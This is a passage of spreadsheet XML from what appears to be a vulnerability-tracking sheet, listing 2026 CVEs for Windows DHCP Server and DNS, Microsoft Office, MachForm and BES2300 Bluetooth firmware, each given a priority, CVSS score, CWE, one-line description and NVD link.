          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T779" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77498</t>
        </is>
      </c>
    </row>
    <row r="780">
      <c r="A780" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B780" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C780" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77499</t>
        </is>
      </c>
      <c r="D780" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E780" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F780" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G780" s="5" t="inlineStr"/>
      <c r="H780" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I780" s="5" t="inlineStr"/>
      <c r="J780" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K780" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L780" s="5" t="inlineStr"/>
      <c r="M780" s="5" t="inlineStr"/>
      <c r="N780" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O780" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P780" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q780" s="5" t="inlineStr"/>
      <c r="R780" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S780" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T780" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77499</t>
        </is>
      </c>
    </row>
    <row r="781">
      <c r="A781" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B781" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C781" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77501</t>
        </is>
      </c>
      <c r="D781" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E781" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F781" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G781" s="5" t="inlineStr"/>
      <c r="H781" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I781" s="5" t="inlineStr"/>
      <c r="J781" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K781" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L781" s="5" t="inlineStr"/>
      <c r="M781" s="5" t="inlineStr"/>
      <c r="N781" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O781" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P781" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q781" s="5" t="inlineStr"/>
      <c r="R781" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S781" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T781" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77501</t>
        </is>
      </c>
    </row>
    <row r="782">
      <c r="A782" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B782" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C782" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77502</t>
        </is>
      </c>
      <c r="D782" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E782" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F782" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G782" s="5" t="inlineStr"/>
      <c r="H782" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I782" s="5" t="inlineStr"/>
      <c r="J782" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K782" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L782" s="5" t="inlineStr"/>
      <c r="M782" s="5" t="inlineStr"/>
      <c r="N782" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O782" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P782" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q782" s="5" t="inlineStr"/>
      <c r="R782" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S782" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T782" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77502</t>
        </is>
      </c>
    </row>
    <row r="783">
      <c r="A783" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B783" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C783" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77886</t>
        </is>
      </c>
      <c r="D783" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E783" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F783" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G783" s="5" t="inlineStr"/>
      <c r="H783" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I783" s="5" t="inlineStr"/>
      <c r="J783" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K783" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L783" s="5" t="inlineStr"/>
      <c r="M783" s="5" t="inlineStr"/>
      <c r="N783" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O783" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P783" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q783" s="5" t="inlineStr"/>
      <c r="R783" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S783" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T783" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77886</t>
        </is>
      </c>
    </row>
    <row r="784">
      <c r="A784" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B784" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C784" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77888</t>
        </is>
      </c>
      <c r="D784" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E784" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F784" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G784" s="5" t="inlineStr"/>
      <c r="H784" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I784" s="5" t="inlineStr"/>
      <c r="J784" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K784" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L784" s="5" t="inlineStr"/>
      <c r="M784" s="5" t="inlineStr"/>
      <c r="N784" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O784" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P784" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q784" s="5" t="inlineStr"/>
      <c r="R784" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S784" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T784" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77888</t>
        </is>
      </c>
    </row>
    <row r="785">
      <c r="A785" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B785" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C785" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77889</t>
        </is>
      </c>
      <c r="D785" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E785" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F785" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G785" s="5" t="inlineStr"/>
      <c r="H785" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I785" s="5" t="inlineStr"/>
      <c r="J785" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K785" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L785" s="5" t="inlineStr"/>
      <c r="M785" s="5" t="inlineStr"/>
      <c r="N785" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O785" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P785" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q785" s="5" t="inlineStr"/>
      <c r="R785" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S785" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T785" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77889</t>
        </is>
      </c>
    </row>
    <row r="786">
      <c r="A786" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B786" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C786" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77890</t>
        </is>
      </c>
      <c r="D786" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E786" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F786" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G786" s="5" t="inlineStr"/>
      <c r="H786" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I786" s="5" t="inlineStr"/>
      <c r="J786" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K786" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L786" s="5" t="inlineStr"/>
      <c r="M786" s="5" t="inlineStr"/>
      <c r="N786" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O786" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P786" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q786" s="5" t="inlineStr"/>
      <c r="R786" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S786" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T786" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77890</t>
        </is>
      </c>
    </row>
    <row r="787">
      <c r="A787" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B787" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C787" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77893</t>
        </is>
      </c>
      <c r="D787" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E787" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F787" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G787" s="5" t="inlineStr"/>
      <c r="H787" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I787" s="5" t="inlineStr"/>
      <c r="J787" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K787" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L787" s="5" t="inlineStr"/>
      <c r="M787" s="5" t="inlineStr"/>
      <c r="N787" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O787" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P787" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q787" s="5" t="inlineStr"/>
      <c r="R787" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S787" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T787" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77893</t>
        </is>
      </c>
    </row>
    <row r="788">
      <c r="A788" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B788" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C788" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77895</t>
        </is>
      </c>
      <c r="D788" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E788" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F788" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G788" s="5" t="inlineStr"/>
      <c r="H788" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I788" s="5" t="inlineStr"/>
      <c r="J788" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K788" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L788" s="5" t="inlineStr"/>
      <c r="M788" s="5" t="inlineStr"/>
      <c r="N788" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O788" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P788" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q788" s="5" t="inlineStr"/>
      <c r="R788" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S788" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T788" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77895</t>
        </is>
      </c>
    </row>
    <row r="789">
      <c r="A789" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B789" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C789" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77898</t>
        </is>
      </c>
      <c r="D789" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E789" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F789" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G789" s="5" t="inlineStr"/>
      <c r="H789" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I789" s="5" t="inlineStr"/>
      <c r="J789" s="5" t="inlineStr"/>
      <c r="K789" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L789" s="5" t="inlineStr"/>
      <c r="M789" s="5" t="inlineStr"/>
      <c r="N789" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O789" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P789" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q789" s="5" t="inlineStr"/>
      <c r="R789" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S789" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T789" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77898</t>
        </is>
      </c>
    </row>
    <row r="790">
      <c r="A790" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B790" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C790" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78523</t>
        </is>
      </c>
      <c r="D790" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E790" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F790" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G790" s="5" t="inlineStr"/>
      <c r="H790" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I790" s="5" t="inlineStr"/>
      <c r="J790" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K790" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L790" s="5" t="inlineStr"/>
      <c r="M790" s="5" t="inlineStr"/>
      <c r="N790" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O790" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P790" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q790" s="5" t="inlineStr"/>
      <c r="R790" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S790" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T790" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78523</t>
        </is>
      </c>
    </row>
    <row r="791">
      <c r="A791" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B791" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C791" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78574</t>
        </is>
      </c>
      <c r="D791" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E791" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F791" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G791" s="5" t="inlineStr"/>
      <c r="H791" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I791" s="5" t="inlineStr"/>
      <c r="J791" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K791" s="5" t="inlineStr"/>
      <c r="L791" s="5" t="inlineStr"/>
      <c r="M791" s="5" t="inlineStr"/>
      <c r="N791" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O791" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P791" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q791" s="5" t="inlineStr"/>
      <c r="R791" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="S791"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T791" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78574</t>
        </is>
      </c>
    </row>
    <row r="792">
      <c r="A792" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B792" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C792" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78837</t>
        </is>
      </c>
      <c r="D792" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E792" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F792" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G792" s="5" t="inlineStr"/>
      <c r="H792" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I792" s="5" t="inlineStr"/>
      <c r="J792" s="5" t="inlineStr"/>
      <c r="K792" s="5" t="inlineStr"/>
      <c r="L792" s="5" t="inlineStr"/>
      <c r="M792" s="5" t="inlineStr"/>
      <c r="N792" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O792" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P792" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q792" s="5" t="inlineStr"/>
      <c r="R792" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S792" s="5" t="inlineStr">
        <is>
          <t>A SQL injection vulnerability in the ap_form_{id} parameter in AppNitro MachForm v30 allows attackers to access sensitive database information via a crafted SQL statement.</t>
        </is>
      </c>
      <c r="T792" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78837</t>
        </is>
      </c>
    </row>
    <row r="793">
      <c r="A793" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B793" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C793" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79377</t>
        </is>
      </c>
      <c r="D793" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E793" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F793" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G793" s="5" t="inlineStr"/>
      <c r="H793" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I793" s="5" t="inlineStr"/>
      <c r="J793" s="5" t="inlineStr"/>
      <c r="K793" s="5" t="inlineStr"/>
      <c r="L793" s="5" t="inlineStr"/>
      <c r="M793" s="5" t="inlineStr"/>
      <c r="N793" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O793" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P793" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q793" s="5" t="inlineStr"/>
      <c r="R793" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S793" s="5" t="inlineStr">
        <is>
          <t>A heap overflow in the a2dp_decoder_sbc.cpp component of Bestechnic Co., Ltd BES2300 Bluetooth Audio SoC firmware v3.x and earlier allows attackers to cause a Denial of Service (DoS) via sending a crafted L2CAP packet.</t>
        </is>
      </c>
      <c r="T793" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79377</t>
        </is>
      </c>
    </row>
    <row r="794">
      <c r="A794" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B794" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C794" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79378</t>
        </is>
      </c>
      <c r="D794" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E794" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F794" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G794" s="5" t="inlineStr"/>
      <c r="H794" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I794" s="5" t="inlineStr"/>
      <c r="J794" s="5" t="inlineStr"/>
      <c r="K794" s="5" t="inlineStr"/>
      <c r="L794" s="5" t="inlineStr"/>
      <c r="M794" s="5" t="inlineStr"/>
      <c r="N794" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O794" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P794" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q794" s="5" t="inlineStr"/>
      <c r="R794" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S794" s="5" t="inlineStr">
        <is>
          <t>An issue in the btm_acl_handle() function of Bestechnic Co., Ltd BES2300 Bluetooth Audio SoC firmware v3.x and earlier allows attackers to cause a Denial of Service (DoS) via sending a crafted L2CAP packet.</t>
        </is>
      </c>
      <c r="T794" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79378</t>
        </is>
      </c>
    </row>
    <row r="795">
      <c r="A795" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B795" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C795" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79572</t>
        </is>
      </c>
      <c r="D795" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E795" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F795" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G795" s="5" t="inlineStr"/>
      <c r="H795" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I795" s="5" t="inlineStr"/>
      <c r="J795" s="5" t="inlineStr"/>
      <c r="K795" s="5" t="inlineStr"/>
      <c r="L795" s="5" t="inlineStr"/>
      <c r="M795" s="5" t="inlineStr"/>
      <c r="N795" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O795" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
